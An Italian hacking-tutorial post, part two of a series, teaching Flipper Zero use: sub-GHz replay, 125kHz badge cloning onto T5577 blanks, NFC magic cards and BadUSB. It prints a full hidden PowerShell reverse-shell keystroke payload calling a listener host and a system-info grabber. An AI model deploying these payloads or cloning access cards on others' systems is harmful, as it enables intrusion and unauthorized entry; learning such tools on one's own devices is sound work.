The Hacker's Path: Serie in 5 Parti
Parte 1: Introduzione → Parte 2: Padronanza del Flipper → Parte 3: Fondamenti di Kali → Parte 4: Sfruttamento → Parte 5: L'Audit Completo
Nella Parte 1, hai mosso i primi passi. Hai clonato alcuni telecomandi IR, scansionato carte NFC, osservato lo spettro sub-GHz illuminarsi e digitato "Hello World" con BadUSB. Hai visto che la sicurezza e spesso un'illusione.
Ora andiamo in profondita. Alla fine di questo articolo, capirai ogni protocollo principale con cui il tuo Flipper Zero puo interagire, non solo come usarli, ma perche funzionano cosi e cosa significa per la sicurezza.
Avvertimento: Scoprirai che diverse cose che credevi sicure... non lo sono.
La Filosofia Flipper
Prima di immergerci nei protocolli, stabiliamo la mentalita giusta. Il Flipper Zero non e un "dispositivo di hacking" nel senso hollywoodiano. E uno strumento di apprendimento che ti permette di interagire con frequenze radio e protocolli hardware normalmente invisibili.
Pensalo come una lente d'ingrandimento per segnali wireless. I segnali erano sempre li. Semplicemente non potevi vederli. Ora puoi.
Questa distinzione e importante perche cambia il tuo approccio alla sicurezza. La maggior parte della "sicurezza" si basa sull'oscurita, sull'assunzione che gli attaccanti non sapranno come interagire con un sistema. Il tuo Flipper rimuove quell'oscurita.
Spoiler: Spesso non esiste.
⚠️ Promemoria: Solo le Tue Cose
Tutto in questo articolo serve a testare I TUOI dispositivi, carte e sistemi. Le tecniche funzionano sulle cose di chiunque, questo e il punto. Ma usarle su sistemi che non possiedi e illegale.
Sub-GHz: Lo Spettro Invisibile
Le frequenze radio sub-gigahertz sono ovunque. La porta del garage, la chiave dell'auto, la stazione meteo, il campanello wireless, i sensori di pressione pneumatici, i dispositivi smart home, trasmettono tutti costantemente in bande di frequenza sotto 1 GHz.
Perche sub-GHz? Le frequenze piu basse viaggiano piu lontano e penetrano meglio i muri rispetto a frequenze piu alte come il WiFi (2.4/5 GHz).
Il Panorama delle Frequenze
- 315 MHz: Nord America: vecchi portoni garage, chiavi auto
- 390 MHz: Nord America: portoni garage, alcuni automotive
- 433.92 MHz: Mondiale: stazioni meteo, sensori, dispositivi europei, molti prodotti IoT
- 868 MHz: Europa: smart home, LoRa, contatori utenze
- 915 MHz: Americhe: LoRa, smart home, industriale
Con firmware Momentum, il tuo Flipper puo trasmettere e ricevere su tutte queste bande indipendentemente dalla tua posizione fisica.
Progetto: Analizza il Tuo Portone del Garage
Tempo: 15 minuti
Cosa imparerai: La differenza tra codici statici e codici rolling, e perche e importante
Passaggi:
- Naviga a Sub-GHz → Read
- Stai vicino al garage (non cosi vicino da far aprire la porta)
- Premi il pulsante del telecomando del garage
- Osserva il Flipper catturare il segnale
- Esamina cosa e stato catturato
Cosa potresti vedere:
- Princeton, Linear, Chamberlain (vecchio): Codici statici. Lo stesso codice ogni volta. Vulnerabile ad attacchi di replay.
- KeeLoq, Security+ 2.0, Rolling Code: Codici rolling. Ogni trasmissione usa un codice diverso da una sequenza sincronizzata.
La realta: Se il tuo portone usa un codice statico (molti installati prima del ~2015), chiunque catturi quel segnale una volta puo riprodurlo per sempre.
Codici Rolling Spiegati
I portoni moderni e le chiavi auto usano codici rolling. Funzionano cosi:
- Trasmettitore e ricevitore condividono un seed segreto e un algoritmo
- Ogni pressione genera il codice successivo in una sequenza sincronizzata
- Il ricevitore accetta il codice corrente O uno dei successivi ~256 codici
- Un codice usato viene invalidato per sempre
Perche E Importante
I codici rolling sono stati inventati perche il mondo sub-GHz ha scoperto che la sicurezza per oscurita fallisce. Qualcuno ha capito come catturare e riprodurre segnali, quindi l'industria ha dovuto implementare vera sicurezza crittografica.
Progetto: Cattura Dati della Stazione Meteo
Tempo: 10 minuti
Passaggi:
- Naviga a Sub-GHz → Read
- Aspetta vicino a qualsiasi sensore meteo wireless
- La maggior parte trasmette ogni 30-60 secondi
- Cattura la trasmissione
Cosa troverai: Temperatura, umidita, stato batteria, ID sensore, tutto trasmesso in chiaro. Nessuna crittografia, nessuna autenticazione.
RFID: Il Mondo a 125kHz
RFID a bassa frequenza (125kHz) e la tecnologia di carte di prossimita piu vecchia e semplice. La trovi nelle tessere palestra, vecchie carte d'accesso uffici, parcheggi e sistemi d'ingresso di condomini.
Ed e quasi universalmente terribile per la sicurezza.
Come Funziona RFID 125kHz
Queste carte sono passive, non hanno batteria. Quando ne tieni una vicino a un lettore, il campo elettromagnetico del lettore alimenta la carta, e la carta trasmette il suo numero ID. Fine. Nessun challenge-response. Nessuna crittografia. Solo: "Sono la carta numero 12345."
Tipi Comuni di Carte 125kHz
- EM4100: Estremamente comune. Trasmette semplicemente un ID a 40 bit. Zero sicurezza.
- HID Prox: La carta d'accesso aziendale piu comune. Zero sicurezza.
- Indala: Meno comune. Stesso problema: nessuna sicurezza.
- AWID: Un'altra variante. Stessa debolezza fondamentale.
Progetto: Clona la Tua Tessera Palestra
Tempo: 5 minuti
Cosa ti serve: La tua tessera palestra/piscina/appartamento 125kHz, una carta vuota T5577 ($1-2 l'una)
Passaggi:
- Naviga a 125 kHz RFID → Read
- Tieni la carta contro il retro del Flipper
- Aspetta lettura riuscita
- Salva la carta con un nome riconoscibile
- Per testare l'emulazione: Saved → Select Card → Emulate
- Tieni il Flipper al lettore della palestra
Per scrivere su una T5577 vuota:
- Vai alla carta salvata
- Seleziona Write
- Tieni una carta T5577 vuota al Flipper
- Aspetta conferma di scrittura
- Ora hai un clone fisico
La T5577: La Tua Carta Magica
La T5577 e una carta RFID riscrivibile che puo emulare la maggior parte dei tipi di carte 125kHz.
Cosa Rivela
La "sicurezza" RFID 125kHz e puro teatro. Questi sistemi assumono che non puoi leggere la carta, copiare i dati, ne scriverli su un'altra carta. Tutte e tre le assunzioni sono false con attrezzatura consumer.
Punto Chiave
La sicurezza RFID 125kHz e puro teatro. Questi sistemi assumono che non puoi leggere, copiare o riscrivere dati delle carte. Tutte e tre le assunzioni sono false con attrezzatura consumer sotto i $200.
NFC: Il Mondo a 13.56MHz
NFC ad alta frequenza (13.56 MHz) e la generazione piu recente. Alimenta pagamenti contactless, carte d'accesso moderne, sistemi di trasporto, chiavi d'hotel e il tap-to-pay del telefono.
Tipi di Carte NFC
- MIFARE Classic: Estremamente comune. Crittografia proprietaria craccata anni fa. Vulnerabile.
- MIFARE Ultralight: Carte semplici con sicurezza minima.
- NTAG: Comune nei tag NFC per automazione.
- MIFARE DESFire: Davvero sicura. Crittografia AES.
- EMV (Carte di Pagamento): Crittografia forte, limiti transazione, rilevamento frodi.
Progetto: Analizza il Tuo Badge di Lavoro
Tempo: 10 minuti
Passaggi:
- Naviga a NFC → Read
- Tieni il badge contro il retro del Flipper
- Aspetta il completamento della lettura
- Esamina i risultati
Clonazione UID vs Clonazione Completa
Distinzione importante: il Flipper puo sempre leggere ed emulare l'UID di una carta. Alcuni sistemi controllano solo l'UID. I sistemi migliori controllano UID E dati crittografati.
Progetto: Analisi Carta d'Hotel
Tempo: 5 minuti (la prossima volta in hotel)
Carte Magiche per NFC
- Gen1 (UID Modificabile): Puo scrivere UID personalizzato.
- Gen2 (CUID): Migliore compatibilita.
- Gen3 (UFUID): Puo bloccare l'UID dopo la scrittura.
- Gen4 (Ultimate Magic): La piu flessibile.
Infrarosso: Controllo Completo
Costruire la Libreria di Telecomandi Definitiva
Il firmware Momentum include IRDB, un enorme database di telecomandi pre-catturati.
Progetto: Costruisci il Tuo Arsenale IR
Tempo: 20 minuti
Passaggi:
- Sul Flipper: Infrared → Universal Remotes
- Troverai telecomandi universali pre-costruiti
- Testali sui tuoi dispositivi
- Per dispositivi non coperti, usa Learn New Remote
- Organizza per stanza o tipo di dispositivo
Cattura IR Grezza
Naviga a Infrared → Learn New → Raw quando il riconoscimento standard non funziona.
BadUSB: L'Alternativa al Rubber Ducky
BadUSB sfrutta un difetto fondamentale: i computer si fidano implicitamente delle tastiere. Il tuo Flipper puo digitare circa 1.000 caratteri al secondo.
Fondamentali di DuckyScript
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPEProgetto: Raccoglitore Informazioni di Sistema
Tempo: 15 minuti
REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTERProgetto: Setup Reverse Shell
Tempo: 30 minuti
Su Kali - Avvia listener:
nc -lvnp 4444
Payload BadUSB (target Windows):
REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER⚠️ Questi Payload Sono Reali
Usali SOLO su macchine tue. Eseguirli sulla macchina di qualcun altro e un reato federale.
Payload Divertenti per Dimostrazioni
REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTERREM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROWGPIO: Espansione Hardware
Moduli Indispensabili
- WiFi Dev Board: Aggiunge capacita WiFi. Essenziale dalla Parte 3.
- Antenna Esterna CC1101: Estende drasticamente la portata Sub-GHz.
- ESP32 Marauder: Trasforma il Flipper in piattaforma hacking WiFi/Bluetooth.
- ProtoBoard: Per progetti personalizzati.
Progetto: Setup WiFi Dev Board
Tempo: 20 minuti
Passaggi:
- Flash firmware Marauder su ESP32
- Connetti ai pin GPIO del Flipper
- Naviga a GPIO → ESP32 → Marauder
- Ora hai WiFi scanning, deauth e packet capture
Funzionalita Avanzate Momentum
- Animazioni Desktop: Puramente cosmetiche, ma divertenti.
- Protocolli Estesi: Supporto aggiuntivo per protocolli.
- Hub Applicazioni: App aggiuntive: giochi, strumenti, utilita specializzate.
- Pack Asset Personalizzati: Cambia l'intero aspetto.
Cosa Hai Padroneggiato
Ora capisci:
- Sub-GHz: Come comunicano portoni garage, chiavi auto e sensori, e perche i codici rolling contano
- RFID 125kHz: Perche tessere palestra e vecchi badge sono banalmente clonabili
- NFC 13.56MHz: La differenza tra crittografia rotta (MIFARE Classic) e vera sicurezza (DESFire)
- Infrarosso: Come costruire una libreria di telecomandi universali
- BadUSB: Perche la fiducia USB HID e una vulnerabilita fondamentale
- GPIO: Come espandersi a WiFi, portata estesa e hardware personalizzato
Il tuo Flipper e ora un'arma. Ma e un cacciavite rispetto a Kali Linux, che e un'intera officina. E ora di avviare il vero ambiente di hacking.
The Hacker's Path
Una serie in 5 parti che ti porta da curioso a capace.
Parte 1: Introduzione Parte 2: Padronanza Flipper ✓ Parte 3: Fondamenti Kali Parte 4: Sfruttamento Parte 5: Audit Completo
Checklist Parte 2
☐ Sub-GHz: Portone garage analizzato, codici rolling vs statici compresi
☐ RFID 125kHz: Carte lette, almeno un clone testato
☐ NFC: Badge di lavoro analizzato, tipo carta identificato
☐ Infrarosso: Libreria completa telecomandi di casa costruita
☐ BadUSB: Payload info sistema testato, reverse shell compreso
☐ GPIO: WiFi dev board pronto per Parte 3
☐ Carte Magiche: T5577 e/o carte magiche NFC acquisite per test
Cosa Viene Dopo
Nella Parte 3, lasciamo le capacita focalizzate del Flipper ed entriamo nell'ambiente completo di penetration testing: Kali Linux.
Imparerai:
- Configurazione del laboratorio di hacking (installazione e configurazione VM)
- Ricognizione di rete con nmap
- Ricognizione wireless: cattura handshake WiFi con aircrack-ng
- Ricognizione web: scoprire cosa espone il tuo router
- Connettere catture Flipper ai workflow Kali
Ci vediamo nella Parte 3.